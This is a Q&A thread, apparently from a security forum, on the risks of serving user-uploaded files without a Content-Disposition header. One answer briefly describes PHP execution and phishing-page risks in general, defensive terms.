4

Imagine a server that serves untrusted user-provided files and allows other users to download them. Under some circumstances server can be tricked to return responses to download file requests without Content-Disposition header (i.e. files are shown in browser's window inlined)

However, other measures of security hygiene are still in place:

  • Files are served at another domain than the main site's content
  • Correct Content-Type and X-Content-Type-Options:nosniff exist

What are security risks of returning responses without Content-Disposition header?

Rory Alsop
  • 61,474
  • 12
  • 117
  • 321
Andrei Botalov
  • 5,317
  • 10
  • 46
  • 73

1 Answers1

2

Depends what filetypes are allowed to be uploaded and how the files are being handled.

  • If the page is directly loaded, the file ends in .php and the webserver recognizes and executes PHP files, then you risk having the entire domain compromised.
  • A smaller issue is that an html file may be a phishing page, sending any results to a server controlled by the attacker (cross-domain posting via javascript may not be possible, but you can make any cross-domain request through (visible or invisible) forms). The domain and perhaps even HTTPS certificate clearly shows that it is on your domain or a subdomain (unless you use a completely different domain), and thus the user might think that the page is trustworthy.
  • And perhaps other things that don't come to mind right now.
Luc
  • 32,378
  • 8
  • 75
  • 137